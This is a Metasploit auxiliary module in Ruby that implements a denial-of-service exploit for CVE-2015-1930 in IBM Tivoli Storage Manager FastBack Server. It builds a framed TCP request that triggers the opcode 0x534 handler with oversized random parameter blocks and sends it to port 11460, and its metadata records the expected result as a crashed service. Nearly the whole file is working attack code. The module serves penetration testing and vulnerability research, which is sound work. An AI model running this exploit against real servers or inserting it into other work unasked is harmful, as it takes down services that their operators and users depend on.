GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/misc/ibm_tsm_dos.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary DoS module for CVE-2015-1930 (IBM Tivoli Storage Manager FastBack
# Server, opcode 0x534 handler). It opens one TCP connection to RPORT
# (default 11460), writes a single framed request and disconnects.
#
# The module metadata marks the outcome as CRASH_SERVICE_DOWN, i.e. the impact
# is on the availability of the target service.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers the module metadata and the default target port.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(update_info(
      info,
      'Name' => 'IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service',
      'Description' => %q{
        This module exploits a denial of service condition present in IBM Tivoli Storage Manager
        FastBack Server when dealing with packets triggering the opcode 0x534 handler.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Gianni Gnesa', # Public disclosure/Proof of Concept
        'William Webb <william_webb[at]rapid7.com>', # Metasploit
      ],
      'References' => [
        ['CVE', '2015-1930'],
        ['EDB', '38979'],
        ['OSVDB', '132307']
      ],
      'DisclosureDate' => '2015-12-15',
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    ))

    register_options([Opt::RPORT(11460)])
  end

  # Builds one framed request.
  #
  # Layout as assembled below (offsets relative to the start of the message):
  #   0   4-byte big-endian length of everything that follows
  #   4   12 random alphabetic filler bytes
  #   16  opcode, 32-bit little-endian
  #   20  seven-field header continues: 0, len(p1), len(p1), len(p2),
  #       len(p1) + len(p2), len(p3) -- all 32-bit little-endian
  #   44  8 random alphabetic filler bytes
  #   52  p1, p2, p3 back to back
  #
  # The opcode at offset 16 is the only fixed, non-random field ahead of the
  # parameters, so it is the field a network signature for this request would
  # key on; the filler bytes differ on every call.
  #
  # Lengths are taken with String#length (characters), which equals the byte
  # count only for single-byte content such as the ASCII strings #run passes.
  #
  # @param opcode [Integer] handler opcode placed in the header
  # @param p1 [String] first parameter block
  # @param p2 [String] second parameter block
  # @param p3 [String] third parameter block
  # @return [String] length-prefixed message ready to be written to the socket
  def tv_pkt(opcode, p1 = '', p2 = '', p3 = '')
    leading_filler = Rex::Text.rand_text_alpha(0x0C)

    header_fields = [
      opcode,
      0x00,
      p1.length,
      p1.length,
      p2.length,
      p1.length + p2.length,
      p3.length
    ].pack('V7')

    trailing_filler = Rex::Text.rand_text_alpha(0x08)

    # Left-to-right concatenation, same order as the fields listed above.
    body = leading_filler + header_fields + trailing_filler + p1 + p2 + p3

    [body.length].pack('N') << body
  end

  # Connects, sends one opcode 0x534 request and disconnects.
  #
  # No reply is read and the service state is not checked afterwards, so
  # 'Packet sent!' only means the socket write completed. Connection-level
  # failures are reported and logged; the socket is always closed.
  def run
    connect
    print_status("Connected to: #{rhost} port: #{rport}")
    print_status('Sending malicious packet')

    file_field = "File: #{Rex::Text.rand_text_alpha(0x200)} From: 0 To: 0 ChunkLoc: 0 FileLoc: 0"
    request = tv_pkt(
      0x534,
      file_field,
      Rex::Text.rand_text_alpha(0x60),
      Rex::Text.rand_text_alpha(0x60)
    )

    sock.put(request)
    print_status('Packet sent!')
  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout,
         Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
    print_error("Exploit failed: #{e.class} #{e.message}")
    elog(e)
  ensure
    disconnect
  end
end